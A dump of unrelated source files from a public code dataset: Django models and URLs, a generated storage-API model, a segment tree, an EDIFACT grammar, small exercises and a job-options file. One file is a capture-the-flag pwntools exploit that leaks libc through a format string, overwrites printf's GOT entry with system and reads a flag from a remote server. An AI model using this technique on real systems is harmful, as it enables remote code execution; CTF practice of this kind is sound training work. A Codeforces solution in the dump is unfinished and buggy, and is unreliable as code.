5bc99ce805369e20b7123860247511801e95408a | a08225934c425be313a12975c9563a72ded58be6 | /round644/spystring.py | ce55548d95836a56223f6329afb0e371f8c94c36 | [] | no_license | marcus-aurelianus/codeforce | 27c966554dee9986f23fb2925bd53e6cceb8b9e9 | 4764df151ade7806e32b6c88283a2de946f99e16 | refs/heads/master | 2023-03-18T09:30:55.042594 | 2021-03-12T18:14:08 | 2021-03-12T18:14:08 | 231,387,022 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,221 | py | import sys
reader = (s.rstrip() for s in sys.stdin)
input = reader.__next__
def gift():
for _ in range(t):
n,m = list(map(int,input().split()))
arrys=[]
for i in range(n):
kap=list(input())
arrys.append(kap)
diffdic={}
for i in range(n):
for j in range(m):
for k in range(i+1,n):
if arrys[i][j]!=arrys[k][j]:
kap=diffdic.get(j,[])
kap.append([i,k])
diffdic[j]=kap
if len(diffdic)>2:
yield -1
else:
ans=""
notin=[]
for j in range(m):
if j not in diffdic:
ans+=arrys[0][j]
else:
counterdic={}
for i in range(n):
ele=arrys[i][j]
freq=counterdic.get(ele,0)
counterdi[ele]=freq+1
maxele=max(counterdic, key=counterdic.get)
yield diffdic
#aaaab
#abaaa
#aabbb
if __name__ == '__main__':
t= int(input())
ans = gift()
print(*ans,sep='\n')
| [
"marcus.lihao@gmail.com"
] | marcus.lihao@gmail.com |
d111130febd4bb406c6961126dc1ccc74bee080c | 2523b2690fadfccbd56153de011b27faa9c31c61 | /urls.py | 8c77ab489dea24ded6afb1dcaa2ac4aea5f7be80 | [] | no_license | victorhook/django-init | 39cf66a33f7a4e10c86f09ade19934996402906a | e38692467ff2c8093e7803b359934ec182fe4681 | refs/heads/master | 2023-04-05T16:31:17.654905 | 2021-04-16T10:44:46 | 2021-04-16T10:44:46 | 358,564,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.urls import path, include
from . import views
# URL routing table: admin site, the stock auth views (login/logout/password
# management) and the project index.  Media files are served from MEDIA_ROOT
# (static() is a no-op unless DEBUG is enabled).
urlpatterns = [
    path('admin/', admin.site.urls),
    path('accounts/', include('django.contrib.auth.urls')),
    path('', views.index, name='index')
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"victorkrook96@gmail.com"
] | victorkrook96@gmail.com |
8c2dbaf86f524f55059765161f070307296f1b6a | 4809471274d6e136ac66d1998de5acb185d1164e | /pypureclient/flasharray/FA_2_5/models/remote_protection_group_snapshot_transfer.py | 6739780776fb0f1bc143dee2bc29bf1b53da6baf | [
"BSD-2-Clause"
] | permissive | astrojuanlu/py-pure-client | 053fef697ad03b37ba7ae21a0bbb466abf978827 | 6fa605079950765c316eb21c3924e8329d5e3e8a | refs/heads/master | 2023-06-05T20:23:36.946023 | 2021-06-28T23:44:24 | 2021-06-28T23:44:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,411 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class RemoteProtectionGroupSnapshotTransfer(object):
    """Swagger-generated model describing the transfer state of a remote
    protection-group snapshot.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the definition.
    """
    # Declared attribute types, as strings, used by the generic to_dict logic.
    swagger_types = {
        'name': 'str',
        'destroyed': 'bool',
        'started': 'int',
        'progress': 'float',
        'completed': 'int',
        'data_transferred': 'int',
        'physical_bytes_written': 'int'
    }
    # Mapping from Python attribute names to JSON field names (identical here).
    attribute_map = {
        'name': 'name',
        'destroyed': 'destroyed',
        'started': 'started',
        'progress': 'progress',
        'completed': 'completed',
        'data_transferred': 'data_transferred',
        'physical_bytes_written': 'physical_bytes_written'
    }
    # No arguments are mandatory for this model.
    required_args = {
    }
    def __init__(
        self,
        name=None, # type: str
        destroyed=None, # type: bool
        started=None, # type: int
        progress=None, # type: float
        completed=None, # type: int
        data_transferred=None, # type: int
        physical_bytes_written=None, # type: int
    ):
        """
        Keyword args:
            name (str): A user-specified name. The name must be locally unique and can be changed.
            destroyed (bool): Returns a value of `true` if the snapshot has been destroyed and is pending eradication. The destroyed snapshot can be recovered by setting `destroyed=false`. Once the eradication pending period has elapsed, the snapshot is permanently eradicated and can no longer be recovered.
            started (int): The timestamp of when the snapshot replication process started. Measured in milliseconds since the UNIX epoch.
            progress (float): The percentage progress of the snapshot transfer from the source array to the target. Displayed in decimal format.
            completed (int): The timestamp of when the snapshot replication process completed. Measured in milliseconds since the UNIX epoch.
            data_transferred (int): The number of bytes transferred from the source to the target as part of the replication process. Measured in bytes.
            physical_bytes_written (int): The amount of physical/logical data written to the target due to replication. Measured in bytes.
        """
        # Only set attributes that were actually supplied; unset attributes
        # raise AttributeError via __getattribute__ below.
        if name is not None:
            self.name = name
        if destroyed is not None:
            self.destroyed = destroyed
        if started is not None:
            self.started = started
        if progress is not None:
            self.progress = progress
        if completed is not None:
            self.completed = completed
        if data_transferred is not None:
            self.data_transferred = data_transferred
        if physical_bytes_written is not None:
            self.physical_bytes_written = physical_bytes_written
    def __setattr__(self, key, value):
        # Reject attributes that are not part of the declared model.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `RemoteProtectionGroupSnapshotTransfer`".format(key))
        self.__dict__[key] = value
    def __getattribute__(self, item):
        # Class-level Property placeholders read as "attribute not set".
        value = object.__getattribute__(self, item)
        if isinstance(value, Property):
            raise AttributeError
        else:
            return value
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively convert nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.swagger_types):
            if hasattr(self, attr):
                value = getattr(self, attr)
                if isinstance(value, list):
                    result[attr] = list(map(
                        lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                        value
                    ))
                elif hasattr(value, "to_dict"):
                    result[attr] = value.to_dict()
                elif isinstance(value, dict):
                    result[attr] = dict(map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict") else item,
                        value.items()
                    ))
                else:
                    result[attr] = value
        if issubclass(RemoteProtectionGroupSnapshotTransfer, dict):
            for key, value in self.items():
                result[key] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, RemoteProtectionGroupSnapshotTransfer):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hubert.chan@purestorage.com"
] | hubert.chan@purestorage.com |
4486aa023f431fbbf7808e49ae5aa6d05d16892a | 8878700a71196cc33b7be00357b625cf9883043c | /store/models.py | f9f50d892d1ed47c590678476853e180d3cda592 | [
"MIT"
] | permissive | Jerome-Celle/Blitz-API | bc7db966cbbb45b29bbbe944adb954d6cb5a0040 | a0f870d6774abf302886ab70e169572a9d0225ef | refs/heads/master | 2021-06-10T06:05:03.753314 | 2018-11-30T15:40:38 | 2018-11-30T15:46:19 | 165,642,546 | 0 | 0 | MIT | 2019-01-14T10:32:29 | 2019-01-14T10:32:28 | null | UTF-8 | Python | false | false | 6,465 | py | import decimal
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation
)
from django.contrib.contenttypes.models import ContentType
from simple_history.models import HistoricalRecords
from blitz_api.models import AcademicLevel
User = get_user_model()  # project user model (honors AUTH_USER_MODEL)
# Selling tax rate from local settings, applied in Order.total_cost.
TAX = settings.LOCAL_SETTINGS['SELLING_TAX']
class Order(models.Model):
    """Represents a transaction."""
    class Meta:
        verbose_name = _("Order")
        verbose_name_plural = _("Orders")
    user = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        verbose_name=_("User"),
        related_name='orders',
    )
    transaction_date = models.DateTimeField(
        verbose_name=_("Transaction date"),
    )
    # Identifiers returned by the external payment gateway.
    authorization_id = models.CharField(
        verbose_name=_("Authorization ID"),
        max_length=253,
    )
    settlement_id = models.CharField(
        verbose_name=_("Settlement ID"),
        max_length=253,
    )
    history = HistoricalRecords()
    @property
    def total_cost(self):
        """Tax-included monetary total of membership/package order lines."""
        cost = 0
        orderlines = self.order_lines.filter(
            models.Q(content_type__model='membership') |
            models.Q(content_type__model='package')
        )
        for orderline in orderlines:
            cost += orderline.content_object.price * orderline.quantity
        return round(decimal.Decimal(float(cost) + TAX * float(cost)), 2)
    @property
    def total_ticket(self):
        """Total for timeslot order lines.

        NOTE(review): despite the name, this sums price * quantity (mirroring
        total_cost) rather than a ticket count -- confirm intent with callers.
        """
        tickets = 0
        orderlines = self.order_lines.filter(
            content_type__model='timeslot'
        )
        for orderline in orderlines:
            tickets += orderline.content_object.price * orderline.quantity
        return tickets
    def __str__(self):
        return str(self.authorization_id)
class OrderLine(models.Model):
    """
    Represents a line of an order. Can specify the product/service with a
    generic relationship.
    """
    class Meta:
        verbose_name = _("Order line")
        verbose_name_plural = _("Order lines")
    # Generic foreign key: (content_type, object_id) -> any product model.
    content_type = models.ForeignKey(
        ContentType,
        on_delete=models.CASCADE
    )
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey(
        'content_type',
        'object_id'
    )
    order = models.ForeignKey(
        Order,
        on_delete=models.CASCADE,
        verbose_name=_("Order"),
        related_name='order_lines',
    )
    quantity = models.PositiveIntegerField(
        verbose_name=_("Quantity"),
    )
    history = HistoricalRecords()
    def __str__(self):
        return str(self.content_object) + ', qt:' + str(self.quantity)
class BaseProduct(models.Model):
    """Abstract model for base products (name, availability, price, details)."""
    name = models.CharField(
        verbose_name=_("Name"),
        max_length=253,
    )
    available = models.BooleanField(
        verbose_name=_("Available")
    )
    price = models.DecimalField(
        max_digits=6,
        decimal_places=2,
        verbose_name=_("Price"),
    )
    details = models.CharField(
        verbose_name=_("Details"),
        max_length=1000,
        null=True,
        blank=True,
    )
    # Reverse side of OrderLine's generic foreign key.
    order_lines = GenericRelation(OrderLine)
    class Meta:
        abstract = True
class Membership(BaseProduct):
    """Represents a membership."""
    class Meta:
        verbose_name = _("Membership")
        verbose_name_plural = _("Memberships")
    duration = models.DurationField()
    # Academic levels allowed to purchase this membership (empty = all).
    academic_levels = models.ManyToManyField(
        AcademicLevel,
        blank=True,
        verbose_name=_("Academic levels"),
        related_name='memberships',
    )
    # History is registered in translation.py
    # history = HistoricalRecords()
    def __str__(self):
        return self.name
class Package(BaseProduct):
    """Represents a reservation package."""
    class Meta:
        verbose_name = _("Package")
        verbose_name_plural = _("Packages")
    # Number of reservations the package grants.
    reservations = models.PositiveIntegerField(
        verbose_name=_("Reservations"),
    )
    # Memberships required to buy this package (empty = unrestricted).
    exclusive_memberships = models.ManyToManyField(
        Membership,
        blank=True,
        verbose_name=_("Memberships"),
        related_name='packages',
    )
    # History is registered in translation.py
    # history = HistoricalRecords()
    def __str__(self):
        return self.name
class CustomPayment(models.Model):
    """
    Represents a custom payment that is not directly related to a product.
    Used for manual custom transactions.
    """
    user = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        verbose_name=_("User"),
        related_name='custom_payments',
    )
    name = models.CharField(
        verbose_name=_("Name"),
        max_length=253,
    )
    price = models.DecimalField(
        max_digits=6,
        decimal_places=2,
        verbose_name=_("Price"),
    )
    details = models.TextField(
        verbose_name=_("Details"),
        max_length=1000,
        null=True,
        blank=True,
    )
    transaction_date = models.DateTimeField(
        verbose_name=_("Transaction date"),
    )
    # Identifiers returned by the external payment gateway.
    authorization_id = models.CharField(
        verbose_name=_("Authorization ID"),
        max_length=253,
    )
    settlement_id = models.CharField(
        verbose_name=_("Settlement ID"),
        max_length=253,
    )
    class Meta:
        verbose_name = _("Custom payment")
        verbose_name_plural = _("Custom payments")
    history = HistoricalRecords()
    def __str__(self):
        return self.name
class PaymentProfile(models.Model):
    """Represents a payment profile linked to an external payment API."""
    class Meta:
        verbose_name = _("Payment profile")
        verbose_name_plural = _("Payment profiles")
    name = models.CharField(
        verbose_name=_("Name"),
        max_length=253,
    )
    owner = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        verbose_name=_("User"),
        related_name='payment_profiles',
    )
    # Profile identifier and URL on the external payment provider.
    external_api_id = models.CharField(
        verbose_name=_("External profile ID"),
        max_length=253,
    )
    external_api_url = models.CharField(
        verbose_name=_("External profile url"),
        max_length=253,
    )
    history = HistoricalRecords()
    def __str__(self):
        return self.name
| [
"frank.jeanneau@gmail.com"
] | frank.jeanneau@gmail.com |
0901d4428fc72e6ab7427fe2b0ad71f2f49f8bad | 9bcf722780efec7994bebe2bb476b0784b0a353a | /307-Range-Sum-Query---Mutable/solution.py | f7918453c713753e26ed2787028a1077c52ef1f3 | [] | no_license | wenjie1070116/Leetcode | a1429810513276b845bfb36284bd747308c015b3 | 5f5791b1e7eefa0205cbb6cb8ae2d5320ffcd916 | refs/heads/master | 2020-04-06T06:50:23.762233 | 2016-08-19T19:36:15 | 2016-08-19T19:36:15 | 58,875,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | class SegmentTreeNode(object):
def __init__(self, start, end, Sum):
self.start, self.end, self.Sum = start, end, Sum
self.left = None
self.right = None
class NumArray(object):
def build(self, start, end, nums):
if start > end: return None
root = SegmentTreeNode(start, end, 0)
if start == end:
root.Sum = nums[start]
else:
mid = start + (end-start)/2
root.left = self.build(start, mid, nums)
root.right = self.build(mid+1, end, nums)
root.Sum = root.left.Sum + root.right.Sum
return root
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
self.root = None
if nums:
self.root = self.build(0, len(nums)-1, nums)
def updateTree(self, root, i, val):
if not root or i < root.start or i > root.end: return
if root.start == root.end == i:
root.Sum = val
return
mid = root.start+(root.end-root.start)/2
if i > mid:
self.updateTree(root.right, i, val)
else:
self.updateTree(root.left, i, val)
root.Sum = root.left.Sum+root.right.Sum
def update(self, i, val):
"""
:type i: int
:type val: int
:rtype: int
"""
return self.updateTree(self.root, i, val)
def sumTree(self, root, i, j):
if not root or j < root.start or i > root.end: return 0
if i <= root.start and j >= root.end:
return root.Sum
left = self.sumTree(root.left, i, j)
right = self.sumTree(root.right, i, j)
return left+right
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
return self.sumTree(self.root, i, j)
# Your NumArray object will be instantiated and called as such:
# numArray = NumArray(nums)
# numArray.sumRange(0, 1)
# numArray.update(1, 10)
# numArray.sumRange(1, 2) | [
"wenjie1070116@gmail.com"
] | wenjie1070116@gmail.com |
cc8cd1ec82602764bdcdb0ffa52d5ca1d2deafeb | 7e40c8bb28c2cee8e023751557b90ef7ef518326 | /axb_2019_fmt32/axb_2019_fmt32.py | f6e5ec9ea1fe5058692348efeed119877bb83dff | [] | no_license | 1337536723/buuctf_pwn | b6e5d65372ed0638a722faef1775026a89321fa3 | cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf | refs/heads/master | 2023-08-29T19:35:04.352530 | 2021-11-16T14:06:20 | 2021-11-16T14:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | from pwn import *
context.log_level = 'debug'
pn = './axb_2019_fmt32'
#p = process(pn)
p = remote('node4.buuoj.cn', 26960)
elf = ELF(pn)
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc = ELF('libc-2.23.so')
#gdb.attach(p, 'b *0x804874b')
printf_got = elf.got['printf']
read_got = elf.got['read']
#leak libc
payload = b'a' + p32(read_got) + b'%8$s'
p.sendlineafter('me:', payload)
p.recv(14)
libc_base = (u32(p.recv(4))) - libc.sym['read']
print('libc_base -> {}'.format(hex(libc_base)))
system = libc_base + libc.sym['system']
p.recvuntil(b'me:')
payload = b'a' + fmtstr_payload(8, { printf_got: system }, write_size = 'byte', numbwritten = 0x9 + 1)
p.sendline(payload)
p.sendlineafter(b'\n', b';cat flag')
p.interactive()
| [
"admin@srmxy.cn"
] | admin@srmxy.cn |
2c4749b55b8632ded80bdbe938e0155072f390c3 | fd453abf8b9b049894ddd7848be7bb5e6f1aa26d | /setup.py | 1cc18dcd8ddbadcb278eb4e7c624ac30f20b794e | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | luzfcb/django-weasyprint-pdf | b9d895f998c467114cfb0e8b7e8ada7ee469d286 | c03ccb8229f317b3492ea7a5e748d4c720a6dd23 | refs/heads/master | 2021-01-23T07:56:38.612731 | 2017-01-31T21:14:19 | 2017-01-31T21:44:26 | 80,524,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,589 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
import io
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
    """Return the text of a file addressed relative to this setup.py.

    Positional arguments are path components joined onto this file's
    directory (an absolute component overrides it); ``encoding`` may be
    passed as a keyword and defaults to 'utf8'.  The file handle is now
    closed deterministically -- the original left it to garbage collection.
    """
    with io.open(
        join(dirname(__file__), *names),
        encoding=kwargs.get('encoding', 'utf8')
    ) as fh:
        return fh.read()
# Package metadata; long_description is README.rst (badges stripped) plus
# CHANGELOG.rst with Sphinx roles downgraded to plain literals.
setup(
    name='django-weasyprint-pdf',
    version='0.1.0',
    license='BSD',
    description='django helper tools to integrate with WeasyPrint',
    long_description='%s\n%s' % (
        re.compile('^.. start-badges.*^.. end-badges', re.M | re.S).sub('', read('README.rst')),
        re.sub(':[a-z]+:`~?(.*?)`', r'``\1``', read('CHANGELOG.rst'))
    ),
    author='Fabio C. Barrionuevo da Luz',
    author_email='bnafta@gmail.com',
    url='https://github.com/luzfcb/django-weasyprint-pdf',
    packages=find_packages('src'),
    package_dir={'': 'src'},
    # Expose every top-level module in src/ as an importable module.
    py_modules=[splitext(basename(path))[0] for path in glob('src/*.py')],
    include_package_data=True,
    zip_safe=False,
    classifiers=[
        # complete classifier list: http://pypi.python.org/pypi?%3Aaction=list_classifiers
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: Unix',
        'Operating System :: POSIX',
        'Operating System :: Microsoft :: Windows',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: Implementation :: PyPy',
        # uncomment if you test on these interpreters:
        # 'Programming Language :: Python :: Implementation :: IronPython',
        # 'Programming Language :: Python :: Implementation :: Jython',
        # 'Programming Language :: Python :: Implementation :: Stackless',
        'Topic :: Utilities',
    ],
    keywords=[
        # eg: 'keyword1', 'keyword2', 'keyword3',
    ],
    install_requires=[
        # eg: 'aspectlib==1.1.1', 'six>=1.7',
    ],
    extras_require={
        # eg:
        # 'rst': ['docutils>=0.11'],
        # ':python_version=="2.6"': ['argparse'],
    },
)
| [
"bnafta@gmail.com"
] | bnafta@gmail.com |
e2ffe3b3f784c2225d4166221373e5d2d572aa63 | cb6d888dfe457cf4a80c5187da7f74be92453a3f | /HackerEarth/Complete the Syllabus.py | 16020d6070ba82ef2c3fd10d99c70f9faad61620 | [] | no_license | abhaykatheria/cp | 7e7b6ce971fdbb9207cb1cba237a3d4b47cff111 | 62cd3895798b64a4b8d307f94d419abe6e6b702f | refs/heads/master | 2021-05-22T15:23:47.512506 | 2020-10-29T09:17:50 | 2020-10-29T09:17:50 | 252,980,081 | 1 | 7 | null | 2020-10-29T09:17:52 | 2020-04-04T11:34:59 | Python | UTF-8 | Python | false | false | 586 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 8 16:16:09 2018
@author: Mithilesh
"""
def syllabus(k,arr):
    """Print the weekday on which the k-th chapter gets finished.

    ``arr[0..6]`` holds chapters covered Monday..Sunday; the weekly plan
    repeats, so ``k`` is first wrapped into a single week (a multiple of
    the weekly total maps to Sunday).
    """
    day_names = ["MONDAY", "TUESDAY", "WEDNESDAY", "THURSDAY",
                 "FRIDAY", "SATURDAY", "SUNDAY"]
    # Running totals of chapters finished by the end of each day.
    running = []
    total = 0
    for day_idx in range(7):
        total += arr[day_idx]
        running.append(total)
    # Wrap k into one week when it exceeds the weekly total.
    if total < k:
        k = k % total
        if k == 0:
            k = total
    for day_name, done_by_day in zip(day_names, running):
        if k <= done_by_day:
            print(day_name)
            break
# Driver: first line is the number of test cases; each case supplies k and
# the seven per-day chapter counts.
t=int(input())
for q in range(t):
    k=int(input())
    arr=list(map(int,input().split()))
syllabus(k,arr) | [
"shubhamtiwari.tiwari84@gmail.com"
] | shubhamtiwari.tiwari84@gmail.com |
03b1c3aaa4b1a0ecf553a3969d8e37a6882cb547 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D05A/SSRECHD05AUN.py | ad47858fe13c1e7b9f99a99290d03be45c4d3a2b | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,448 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD05AUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'GEI', MIN: 1, MAX: 1},
{ID: 'RFF', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'PNA', MIN: 1, MAX: 2, LEVEL: [
{ID: 'ADR', MIN: 0, MAX: 1},
{ID: 'GIR', MIN: 0, MAX: 1},
]},
{ID: 'IND', MIN: 1, MAX: 99, LEVEL: [
{ID: 'DTM', MIN: 1, MAX: 6},
{ID: 'COT', MIN: 1, MAX: 3},
{ID: 'EMP', MIN: 0, MAX: 1, LEVEL: [
{ID: 'PNA', MIN: 0, MAX: 1},
{ID: 'ADR', MIN: 0, MAX: 1},
]},
]},
{ID: 'UNS', MIN: 1, MAX: 1},
{ID: 'PNA', MIN: 1, MAX: 6, LEVEL: [
{ID: 'NAT', MIN: 0, MAX: 1},
{ID: 'DOC', MIN: 0, MAX: 1},
{ID: 'ADR', MIN: 0, MAX: 2},
{ID: 'ATT', MIN: 0, MAX: 5},
{ID: 'DTM', MIN: 0, MAX: 2, LEVEL: [
{ID: 'ADR', MIN: 0, MAX: 1},
]},
{ID: 'PDI', MIN: 0, MAX: 2, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 2},
]},
]},
{ID: 'COT', MIN: 0, MAX: 9, LEVEL: [
{ID: 'CNT', MIN: 1, MAX: 5},
]},
{ID: 'FTX', MIN: 0, MAX: 2},
{ID: 'AUT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
80b7beb89f444ac0b71e10bbaa5697f4458824a9 | fd326562890d4f1987c384fc7c60374938231222 | /OOP/IteratorsAndGenerators/CountdownIterator.py | 154fdb5c0771576a8a4b29805b0a5cc2c3bfb0cf | [] | no_license | miro-lp/SoftUni | cc3b0ff742218c9ceaf93f05c319ccfeed5bc8a4 | 283d9328537919de49f7f6a301e58593bae9ca2a | refs/heads/main | 2023-08-23T21:22:07.856226 | 2021-08-25T15:10:18 | 2021-08-25T15:10:18 | 318,134,101 | 2 | 1 | null | 2021-08-10T12:51:54 | 2020-12-03T09:03:08 | Python | UTF-8 | Python | false | false | 368 | py | class countdown_iterator:
def __init__(self, count):
self.count = count
def __iter__(self):
return self
def __next__(self):
value = self.count
if self.count < 0:
raise StopIteration
self.count -= 1
return value
iterator = countdown_iterator(10)
for item in iterator:
print(item, end=" ")
| [
"miro_lp@abv.bg"
] | miro_lp@abv.bg |
bdc796bee4bc8a8d5e9c396427bde2e9c5892227 | f5fffd35eb8870150cfd9f700b398b25dfe3534e | /lingvo2/gui/video/video.py | 30b89711ebd96f728a5588cf3eed6f3c74df65db | [] | no_license | zaswed76/sling | a09e84e0bcc94e83f43d74b769298544627d271b | 22b945983eb94a5a29523ee54e8197fcc4c60a5c | refs/heads/master | 2022-09-20T07:11:25.242353 | 2020-05-25T11:53:01 | 2020-05-25T11:53:01 | 254,921,645 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | #!/usr/bin/env python3
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import *
from gui.video.player2 import VideoPlayer
from gui.custom.customwidgets import *
class Video(QFrame):
    """Frame widget that hosts a VideoPlayer in a vertical box layout."""
    def __init__(self, main, objectName=None, config=None, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)
        self.main = main
        self.cfg = config
        self.setObjectName(objectName)
        self.player = VideoPlayer(self.cfg, "", self.main, None)
        self.box = BoxLayout(QBoxLayout.TopToBottom, self)
        self.box.addWidget(self.player)
    def setFile(self, file):
        """Load a media file into the player and enable its play button."""
        self.player.setFile(file)
        self.player.playButton.setEnabled(True)
    def play(self):
        """Start playback."""
        self.player.play()
    def pause(self):
        """Pause playback."""
        self.player.mediaPlayer.pause()
    def setSizeVideo(self, w, h):
        """Resize the video surface; the view gets a 1px border on each side."""
        qsizef = QSizeF(w, h)
        self.player.videoItem.setSize(qsizef)
        self.player.graphicsView.setFixedSize(w+2, h+2)
        # self.player.graphicsView.setS
if __name__ == '__main__':
    app = QApplication(sys.argv)
    # app.setStyleSheet(open('./etc/{0}.qss'.format('style'), "r").read())
    # Fix: Video.__init__ requires a ``main`` argument, so Video() raised a
    # TypeError; pass None for standalone use (player gets a None main).
    main = Video(None)
    main.show()
sys.exit(app.exec_()) | [
"zaswed76@gmail.com"
] | zaswed76@gmail.com |
5390adbcfe0b2fb0e3b38ef37b9af7675659560b | 4f313d7a5a141584a0f28e93bb1e3c9bffa3daec | /9_7.py | a360953002fa7e711b1a58dcd5c9789f68f85e80 | [] | no_license | GKPython/A-Byte-of-Python | f19ea8f39589dc073d3e599fe14e8172dee87eb3 | a11587b158225363c6ae900da50652046b4ab90d | refs/heads/master | 2021-06-21T20:24:44.582310 | 2017-09-01T09:00:00 | 2017-09-01T09:00:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | # coding=utf-8
name = 'Swaroop'
if name.startswith('S'):
print 'name is started with "S"'
if 'oo' in name:
print 'name contains "oo"'
if name.find('ar') != -1:
print 'name contains "ar"'
delimiter = '_*_'
shoplist = ['apple', 'pear', 'carrot', 'banana']
print delimiter.join(shoplist) | [
"cbb903601682@163.com"
] | cbb903601682@163.com |
37323d7388b9fc2043edebc8b3ee17d9c40753a4 | ec4c8ec5ea3fc7db5a8552687a21ac554dc49d6f | /seatrekking/users/apps.py | dbc9db0c5f458230678d5d0d95f75027640198c6 | [
"MIT"
] | permissive | martin-martin/seatrekking | 57710c298665d771dea0337a470012b7ff82b237 | fc98fb43f50a070624539a93abcbd189726466fe | refs/heads/master | 2020-03-26T23:18:34.829490 | 2018-08-21T08:11:15 | 2018-08-21T08:11:15 | 145,529,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | from django.apps import AppConfig
class UsersAppConfig(AppConfig):
    """Django app configuration for the users app."""
    # Dotted path Django uses to locate the app.
    name = "seatrekking.users"
    verbose_name = "Users"
    def ready(self):
        """App-registry-ready hook; imports signal handlers for side effects."""
        try:
            # NOTE(review): the app is registered as "seatrekking.users" but the
            # signals module is imported as "users.signals" -- confirm "users"
            # is importable top-level, otherwise this silently does nothing.
            import users.signals  # noqa F401
        except ImportError:
            pass
| [
"breuss.martin@gmail.com"
] | breuss.martin@gmail.com |
c6d48c629d6d9d5f2bb99cb6a1d57f4ddd706ac0 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/Event/EventOverlay/EventOverlayJobTransforms/share/BS_Selector_jobOptions.py | cee37f5f9e62ba8c9e9e26053c3a0368e0f760ca | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,245 | py | include( "ByteStreamCnvSvc/BSEventStorageEventSelector_jobOptions.py" )
svcMgr = theApp.serviceMgr()
ByteStreamInputSvc = svcMgr.ByteStreamInputSvc
theApp.EvtMax = 20
theApp.SkipEvents = 0
MessageSvc.OutputLevel = INFO
